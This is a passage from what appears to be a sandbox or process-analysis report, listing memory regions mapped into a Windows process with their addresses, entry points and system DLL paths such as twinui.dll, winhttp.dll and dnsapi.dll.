"c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\filesyncshell64.dll") Region: id = 794 start_va = 0x7ffd98120000 end_va = 0x7ffd9812cfff monitored = 0 entry_point = 0x7ffd98121ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 795 start_va = 0x7ffd98240000 end_va = 0x7ffd9828cfff monitored = 0 entry_point = 0x7ffd98257de0 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 796 start_va = 0x7ffd982b0000 end_va = 0x7ffd982d5fff monitored = 0 entry_point = 0x7ffd982b1cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 797 start_va = 0x7ffd982e0000 end_va = 0x7ffd983bafff monitored = 0 entry_point = 0x7ffd982f28b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 798 start_va = 0x7ffd985b0000 end_va = 0x7ffd985cefff monitored = 0 entry_point = 0x7ffd985b37e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 799 start_va = 0x7ffd985d0000 end_va = 0x7ffd98648fff monitored = 0 entry_point = 0x7ffd985d76a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 800 start_va = 0x7ffd99ae0000 end_va = 0x7ffd99aebfff monitored = 0 entry_point = 0x7ffd99ae18b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 801 start_va = 0x7ffd99af0000 end_va = 0x7ffd99b3cfff monitored = 0 entry_point = 0x7ffd99afd180 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 802 start_va = 0x7ffd99b40000 end_va = 0x7ffd9a64afff monitored = 0 entry_point = 0x7ffd99c8a540 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 803 start_va = 0x7ffd9a650000 end_va = 0x7ffd9a69ffff monitored = 0 entry_point = 0x7ffd9a652580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 804 start_va = 0x7ffd9a6a0000 end_va = 0x7ffd9ab3ffff monitored = 0 entry_point = 0x7ffd9a738740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 805 start_va = 0x7ffd9ab40000 end_va = 0x7ffd9ab89fff monitored = 0 entry_point = 0x7ffd9ab45800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 806 start_va = 0x7ffd9ab90000 end_va = 0x7ffd9abf9fff monitored = 0 entry_point = 0x7ffd9aba5e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 807 start_va = 0x7ffd9ac00000 end_va = 0x7ffd9ac64fff monitored = 0 entry_point = 0x7ffd9ac04c50 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 808 start_va = 0x7ffd9ac70000 end_va = 0x7ffd9ad3dfff monitored = 0 entry_point = 0x7ffd9aca14c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 809 start_va = 0x7ffd9ad40000 end_va = 0x7ffd9ae38fff monitored = 0 entry_point = 0x7ffd9ad88000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 810 start_va = 0x7ffd9ae40000 end_va = 0x7ffd9ae54fff monitored = 0 entry_point = 0x7ffd9ae42c90 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 811 start_va = 0x7ffd9ae60000 end_va = 0x7ffd9b017fff monitored = 0 entry_point = 0x7ffd9aece630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 812 start_va = 0x7ffd9b0d0000 end_va = 0x7ffd9b180fff monitored = 0 entry_point = 0x7ffd9b0e08f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 813 start_va = 0x7ffd9b2a0000 end_va = 0x7ffd9b2a9fff monitored = 0 entry_point = 0x7ffd9b2a1350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 814 start_va = 0x7ffd9b400000 end_va = 0x7ffd9b40bfff monitored = 0 entry_point = 0x7ffd9b4035c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 815 start_va = 0x7ffd9b430000 end_va = 0x7ffd9b5d8fff monitored = 0 entry_point = 0x7ffd9b484060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 816 start_va = 0x7ffd9c660000 end_va = 0x7ffd9c8d3fff monitored = 0 entry_point = 0x7ffd9c6d0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 817 start_va = 0x7ffd9cb50000 end_va = 0x7ffd9cb6afff monitored = 0 entry_point = 0x7ffd9cb5af40 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 818 start_va = 0x7ffd9cb70000 end_va = 0x7ffd9cde9fff monitored = 0 entry_point = 0x7ffd9cb8a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 819 start_va = 0x7ffd9d0a0000 end_va = 0x7ffd9d3d9fff monitored = 0 entry_point = 0x7ffd9d0a8520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 820 start_va = 0x7ffd9dbf0000 end_va = 0x7ffd9dc83fff monitored = 0 entry_point = 0x7ffd9dc29210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 821 start_va = 0x7ffd9dc90000 end_va = 0x7ffd9df32fff monitored = 0 entry_point = 0x7ffd9dcb6190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 822 start_va = 0x7ffd9e0b0000 end_va = 0x7ffd9e0dafff monitored = 0 entry_point = 0x7ffd9e0bc3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 823 start_va = 0x7ffd9e0e0000 end_va = 0x7ffd9e1ecfff monitored = 0 entry_point = 0x7ffd9e10f420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 824 start_va = 0x7ffd9e270000 end_va = 0x7ffd9e2cefff monitored = 0 entry_point = 0x7ffd9e29bce0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 825 start_va = 0x7ffd9e570000 end_va = 0x7ffd9e584fff monitored = 0 entry_point = 0x7ffd9e571ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 826 start_va = 0x7ffd9e6c0000 end_va = 0x7ffd9e91cfff monitored = 0 entry_point = 0x7ffd9e748610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 827 start_va = 0x7ffd9e920000 end_va = 0x7ffd9e928fff monitored = 0 entry_point = 0x7ffd9e921480 region_type = mapped_file name = "wpportinglibrary.dll" filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll") Region: id = 828 start_va = 0x7ffd9ebb0000 end_va = 0x7ffd9ebfafff monitored = 0 entry_point = 0x7ffd9ebc7b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 829 start_va = 0x7ffd9ece0000 end_va = 0x7ffd9ece9fff monitored = 0 entry_point = 0x7ffd9ece14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 830 start_va = 0x7ffd9ed90000 end_va = 0x7ffd9f017fff monitored = 0 entry_point = 0x7ffd9edef670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 831 start_va = 0x7ffd9f020000 end_va = 0x7ffd9f031fff monitored = 0 entry_point = 0x7ffd9f023580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 832 start_va = 0x7ffd9f050000 end_va = 0x7ffd9f05bfff monitored = 0 entry_point = 0x7ffd9f051860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 833 start_va = 0x7ffd9f060000 end_va = 0x7ffd9f07ffff monitored = 0 entry_point = 0x7ffd9f061920 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 834 start_va = 0x7ffd9f080000 end_va = 0x7ffd9f095fff monitored = 0 entry_point = 0x7ffd9f083380 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 835 start_va = 0x7ffd9f0a0000 end_va = 0x7ffd9f0aafff monitored = 0 entry_point = 0x7ffd9f0a1a40 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 836 start_va = 0x7ffd9f0b0000 end_va = 0x7ffd9f0cafff monitored = 0 entry_point = 0x7ffd9f0b1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 837 start_va = 0x7ffd9f1b0000 end_va = 0x7ffd9f1c4fff monitored = 0 entry_point = 0x7ffd9f1b2dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 838 start_va = 0x7ffd9f1f0000 end_va = 0x7ffd9f28ffff monitored = 0 entry_point = 0x7ffd9f260910 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 839 start_va = 0x7ffda02f0000 end_va = 0x7ffda02fdfff monitored = 0 entry_point = 0x7ffda02f1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 840 start_va = 0x7ffda0310000 end_va = 0x7ffda0376fff monitored = 0 entry_point = 0x7ffda03163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 841 start_va = 0x7ffda0700000 end_va = 0x7ffda076cfff monitored = 0 entry_point = 0x7ffda070d750 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 842 start_va = 0x7ffda07a0000 end_va = 0x7ffda084dfff monitored = 0 entry_point = 0x7ffda07b80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 843 start_va = 0x7ffda0aa0000 end_va = 0x7ffda0af4fff monitored = 0 entry_point = 0x7ffda0aa3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 844 start_va = 0x7ffda0c20000 end_va = 0x7ffda0c47fff monitored = 0 entry_point = 0x7ffda0c28c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 845 start_va = 0x7ffda0c50000 end_va = 0x7ffda0cbffff monitored = 0 entry_point = 0x7ffda0c72960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 846 start_va = 0x7ffda0db0000 end_va = 0x7ffda0dbffff monitored = 0 entry_point = 0x7ffda0db3d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 847 start_va = 0x7ffda10c0000 end_va = 0x7ffda10cbfff monitored = 0 entry_point = 0x7ffda10c1470 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 848 start_va = 0x7ffda1190000 end_va = 0x7ffda11b2fff monitored = 0 entry_point = 0x7ffda11999a0 region_type = mapped_file name = "networkstatus.dll" filename = "\\Windows\\System32\\NetworkStatus.dll" (normalized: "c:\\windows\\system32\\networkstatus.dll") Region: id = 849 start_va = 0x7ffda11c0000 end_va = 0x7ffda11d8fff monitored = 0 entry_point = 0x7ffda11c4520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 850 start_va = 0x7ffda1230000 end_va = 0x7ffda1280fff monitored = 0 entry_point = 0x7ffda12325e0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 851 start_va = 0x7ffda1290000 end_va = 0x7ffda1357fff monitored = 0 entry_point = 0x7ffda12d13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 852 start_va = 0x7ffda1360000 end_va = 0x7ffda13c0fff monitored = 0 entry_point = 0x7ffda1364b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 853 start_va = 0x7ffda1790000 end_va = 0x7ffda17a9fff monitored = 0 entry_point = 0x7ffda1792430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 854 start_va = 0x7ffda17b0000 end_va = 0x7ffda17c5fff monitored = 0 entry_point = 0x7ffda17b19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 855 start_va = 0x7ffda17d0000 end_va = 0x7ffda1807fff monitored = 0 entry_point = 0x7ffda17e8cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 856 start_va = 0x7ffda1810000 end_va = 0x7ffda181afff monitored = 0 entry_point = 0x7ffda1811d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 857 start_va = 0x7ffda18b0000 end_va = 0x7ffda18c5fff monitored = 0 entry_point = 0x7ffda18b1b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 858 start_va = 0x7ffda1a20000 end_va = 0x7ffda1a99fff monitored = 0 entry_point = 0x7ffda1a47630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 859 start_va = 0x7ffda1b10000 end_va = 0x7ffda1bb0fff monitored = 0 entry_point = 0x7ffda1b13db0 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 860 start_va = 0x7ffda1cb0000 end_va = 0x7ffda1cc3fff monitored = 0 entry_point = 0x7ffda1cb50c0 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 861 start_va = 0x7ffda1d80000 end_va = 0x7ffda1e11fff monitored = 0 entry_point = 0x7ffda1dca780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 862 start_va = 0x7ffda1ea0000 end_va = 0x7ffda1eb0fff monitored = 0 entry_point = 0x7ffda1ea3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 863 start_va = 0x7ffda2420000 end_va = 0x7ffda25dcfff monitored = 0 entry_point = 0x7ffda244af90 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 864 start_va = 0x7ffda25e0000 end_va = 0x7ffda2961fff monitored = 0 entry_point = 0x7ffda2631220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 865 start_va = 0x7ffda2970000 end_va = 0x7ffda2aa5fff monitored = 0 entry_point = 0x7ffda299f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 866 start_va = 0x7ffda3af0000 end_va = 0x7ffda3b98fff monitored = 0 entry_point = 0x7ffda3b19010 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 867 start_va = 0x7ffda3ba0000 end_va = 0x7ffda3cadfff monitored = 0 entry_point = 0x7ffda3beeaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 868 start_va = 0x7ffda3cb0000 end_va = 0x7ffda3d19fff monitored = 0 entry_point = 0x7ffda3cb9d60 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 869 start_va = 0x7ffda3d60000 end_va = 0x7ffda3e25fff monitored = 0 entry_point = 0x7ffda3d63ac0 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 870 start_va = 0x7ffda3f00000 end_va = 0x7ffda3fa9fff monitored = 0 entry_point = 0x7ffda3f37c30 region_type = mapped_file name = "structuredquery.dll" filename = "\\Windows\\System32\\StructuredQuery.dll" (normalized: "c:\\windows\\system32\\structuredquery.dll") Region: id = 871 start_va = 0x7ffda40c0000 end_va = 0x7ffda4123fff monitored = 0 entry_point = 0x7ffda40d5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 872 start_va = 0x7ffda43b0000 end_va = 0x7ffda43effff monitored = 0 entry_point = 0x7ffda43c6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 873 start_va = 0x7ffda4460000 end_va = 0x7ffda49a4fff monitored = 0 entry_point = 0x7ffda45fa450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 874 start_va = 0x7ffda49b0000 end_va = 0x7ffda4c1efff monitored = 0 entry_point = 0x7ffda4a622b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 875 start_va = 0x7ffda4ec0000 end_va = 0x7ffda4f0afff monitored = 0 entry_point = 0x7ffda4ed72b0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 876 start_va = 0x7ffda4f10000 end_va = 0x7ffda50c0fff monitored = 0 entry_point = 0x7ffda4fa61a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 877 start_va = 0x7ffda50d0000 end_va = 0x7ffda5171fff monitored = 0 entry_point = 0x7ffda50f0a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 878 start_va = 0x7ffda5180000 end_va = 0x7ffda5427fff monitored = 0 entry_point = 0x7ffda5213250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 879 start_va = 0x7ffda5430000 end_va = 0x7ffda5451fff monitored = 0 entry_point = 0x7ffda5431a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 880 start_va = 0x7ffda5480000 end_va = 0x7ffda553dfff monitored = 0 entry_point = 0x7ffda54c2d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 881 start_va = 0x7ffda5540000 end_va = 0x7ffda5622fff monitored = 0 entry_point = 0x7ffda5577da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 882 start_va = 0x7ffda5930000 end_va = 0x7ffda59a8fff monitored = 0 entry_point = 0x7ffda594fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 883 start_va = 0x7ffda59b0000 end_va = 0x7ffda59effff monitored = 0 entry_point = 0x7ffda59c3750 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 884 start_va = 0x7ffda5b20000 end_va = 0x7ffda5b52fff monitored = 0 entry_point = 0x7ffda5b23800 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 885 start_va = 0x7ffda5b60000 end_va = 0x7ffda5ff2fff monitored = 0 entry_point = 0x7ffda5b6f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 886 start_va = 0x7ffda6000000 end_va = 0x7ffda6066fff monitored = 0 entry_point = 0x7ffda601e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 887 start_va = 0x7ffda6070000 end_va = 0x7ffda60befff monitored = 0 entry_point = 0x7ffda6077ab0 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 888 start_va = 0x7ffda6100000 end_va = 0x7ffda6285fff monitored = 0 entry_point = 0x7ffda614d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 889 start_va = 0x7ffda6290000 end_va = 0x7ffda62abfff monitored = 0 entry_point = 0x7ffda62937a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 890 start_va = 0x7ffda62b0000 end_va = 0x7ffda62e4fff monitored = 0 entry_point = 0x7ffda62b3cc0 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 891 start_va = 0x7ffda62f0000 end_va = 0x7ffda6302fff monitored = 0 entry_point = 0x7ffda62f2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 892 start_va = 0x7ffda6310000 end_va = 0x7ffda6334fff monitored = 0 entry_point = 0x7ffda6312300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 893 start_va = 0x7ffda6350000 end_va = 0x7ffda6364fff monitored = 0 entry_point = 0x7ffda6352850 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 894 start_va = 0x7ffda6370000 end_va = 0x7ffda6394fff monitored = 0 entry_point = 0x7ffda6385220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 895 start_va = 0x7ffda63a0000 end_va = 0x7ffda63dbfff monitored = 0 entry_point = 0x7ffda63a25e0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 896 start_va = 0x7ffda6400000 end_va = 0x7ffda642bfff monitored = 0 entry_point = 0x7ffda6408210 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\System32\\winmmbase.dll" (normalized: "c:\\windows\\system32\\winmmbase.dll") Region: id = 897 start_va = 0x7ffda6430000 end_va = 0x7ffda6452fff monitored = 0 entry_point = 0x7ffda6433670 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 898 start_va = 0x7ffda6530000 end_va = 0x7ffda65c5fff monitored = 0 entry_point = 0x7ffda6555570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 899 start_va = 0x7ffda65d0000 end_va = 0x7ffda65f6fff monitored = 0 entry_point = 0x7ffda65d7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 900 start_va = 0x7ffda6620000 end_va = 0x7ffda66c9fff monitored = 0 entry_point = 0x7ffda6647910 region_type = mapped_file name = "dnsapi.dll" filename = 